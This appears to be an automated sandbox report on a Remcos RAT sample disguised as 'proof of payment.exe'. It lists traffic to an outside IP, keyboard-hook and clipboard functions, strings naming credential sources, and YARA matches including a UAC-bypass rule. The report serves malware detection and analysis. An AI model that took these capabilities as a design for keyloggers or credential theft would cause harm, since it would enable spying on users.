                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,12_2_0041B380
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: proof of payment.exe, 0000000F.00000002.1696807471.00000000010BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                    Source: proof of payment.exe, 0000000F.00000002.1696807471.00000000010BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: proof of payment.exe, proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: proof of payment.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: proof of payment.exe, 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: proof of payment.exe, 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: bhv58.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: bhv58.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                    Source: bhv58.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: bhv58.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: bhv58.tmp.15.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, NvbYSEq.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: proof of payment.exe, 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, NvbYSEq.exe, 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, NvbYSEq.exe, 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, NvbYSEq.exe, 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp2
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpOw
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp_
                    Source: bhv58.tmp.15.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: proof of payment.exe, 00000000.00000002.1499485685.0000000002661000.00000004.00000800.00020000.00000000.sdmp, NvbYSEq.exe, 00000008.00000002.1538465921.0000000002648000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: proof of payment.exe, proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: proof of payment.exe, proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                    Source: proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: proof of payment.exe, 0000000F.00000002.1695925897.00000000009C4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                    Source: proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: proof of payment.exe, 0000000F.00000002.1696807471.00000000010BD000.00000004.00000020.00020000.00000000.sdmp, proof of payment.exe, 0000000F.00000002.1696448109.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: proof of payment.exe, 0000000F.00000002.1696448109.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: proof of payment.exe, 0000000F.00000002.1696448109.0000000000CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
                    Source: proof of payment.exe, 0000000F.00000002.1696448109.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: proof of payment.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: proof of payment.exe, proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: proof of payment.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,0000000012_2_0040A2B8
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\proof of payment.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\proof of payment.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,12_2_0040B70E
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004168C1
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,15_2_0040987A
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004098E2
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_00406DFC
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,17_2_00406E9F
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,20_2_004068B5
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,20_2_004072B5
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,12_2_0040B70E
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_0040A3E0

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.NvbYSEq.exe.3858820.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.proof of payment.exe.3917800.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.proof of payment.exe.389ebe0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.3917153703.00000000030CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3915851761.00000000015EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1517511733.0000000000E57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3915520188.0000000001567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: proof of payment.exe PID: 2228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: proof of payment.exe PID: 3640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: NvbYSEq.exe PID: 4984, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: NvbYSEq.exe PID: 6596, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0041C9E2 SystemParametersInfoW,12_2_0041C9E2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.NvbYSEq.exe.3858820.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.NvbYSEq.exe.3858820.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.proof of payment.exe.3917800.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.proof of payment.exe.3917800.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.proof of payment.exe.389ebe0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.proof of payment.exe.389ebe0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: proof of payment.exe PID: 2228, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: NvbYSEq.exe PID: 4984, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: NvbYSEq.exe PID: 6596, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    .NET source code contains very large array initializations
                    Source: 0.2.proof of payment.exe.2683120.0.raw.unpack, .csLarge array initialization: : array initializer size 33957
                    Source: 0.2.proof of payment.exe.4f00000.4.raw.unpack, .csLarge array initialization: : array initializer size 33957
                    Source: 8.2.NvbYSEq.exe.25c3108.0.raw.unpack, .csLarge array initialization: : array initializer size 33957
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: proof of payment.exe
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_00401806 NtdllDefWindowProc_W,15_2_00401806
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_004018C0 NtdllDefWindowProc_W,15_2_004018C0
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_004016FD NtdllDefWindowProc_A,17_2_004016FD
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_004017B7 NtdllDefWindowProc_A,17_2_004017B7
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_00402CAC NtdllDefWindowProc_A,20_2_00402CAC
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_00402D66 NtdllDefWindowProc_A,20_2_00402D66
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004167B4
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 0_2_00D5DCD40_2_00D5DCD4
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 7_2_100171947_2_10017194
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 7_2_1000B5C17_2_1000B5C1
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 8_2_00C5DCD48_2_00C5DCD4
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 8_2_04B571188_2_04B57118
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 8_2_04B500068_2_04B50006
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 8_2_04B500408_2_04B50040
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 8_2_04B571098_2_04B57109
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 8_2_068600078_2_06860007
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 8_2_06863EE78_2_06863EE7
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 8_2_06863EF88_2_06863EF8
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 8_2_069140E08_2_069140E0
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0043E0CC12_2_0043E0CC
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0041F0FA12_2_0041F0FA
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0045415912_2_00454159
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0043816812_2_00438168
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_004461F012_2_004461F0
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0043E2FB12_2_0043E2FB
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0045332B12_2_0045332B
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0042739D12_2_0042739D
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_004374E612_2_004374E6
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0043E55812_2_0043E558
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0043877012_2_00438770
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_004378FE12_2_004378FE
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0043394612_2_00433946
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0044D9C912_2_0044D9C9
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00427A4612_2_00427A46
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0041DB6212_2_0041DB62
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00427BAF12_2_00427BAF
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00437D3312_2_00437D33
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00435E5E12_2_00435E5E
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00426E0E12_2_00426E0E
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0043DE9D12_2_0043DE9D
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00413FCA12_2_00413FCA
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00436FEA12_2_00436FEA
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0044B04015_2_0044B040
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0043610D15_2_0043610D
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0044731015_2_00447310
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0044A49015_2_0044A490
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0040755A15_2_0040755A
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0043C56015_2_0043C560
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0044B61015_2_0044B610
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0044D6C015_2_0044D6C0
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_004476F015_2_004476F0
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0044B87015_2_0044B870
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0044081D15_2_0044081D
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0041495715_2_00414957
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_004079EE15_2_004079EE
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_00407AEB15_2_00407AEB
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0044AA8015_2_0044AA80
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_00412AA915_2_00412AA9
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_00404B7415_2_00404B74
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_00404B0315_2_00404B03
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0044BBD815_2_0044BBD8
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_00404BE515_2_00404BE5
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_00404C7615_2_00404C76
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_00415CFE15_2_00415CFE
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_00416D7215_2_00416D72
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_00446D3015_2_00446D30
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_00446D8B15_2_00446D8B
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_00406E8F15_2_00406E8F
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_0040503817_2_00405038
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_0041208C17_2_0041208C
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_004050A917_2_004050A9
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_0040511A17_2_0040511A
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_0043C13A17_2_0043C13A
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_004051AB17_2_004051AB
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_0044930017_2_00449300
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_0040D32217_2_0040D322
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_0044A4F017_2_0044A4F0
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_0043A5AB17_2_0043A5AB
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_0041363117_2_00413631
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_0044669017_2_00446690
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_0044A73017_2_0044A730
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_004398D817_2_004398D8
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_004498E017_2_004498E0
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_0044A88617_2_0044A886
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_0043DA0917_2_0043DA09
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_00438D5E17_2_00438D5E
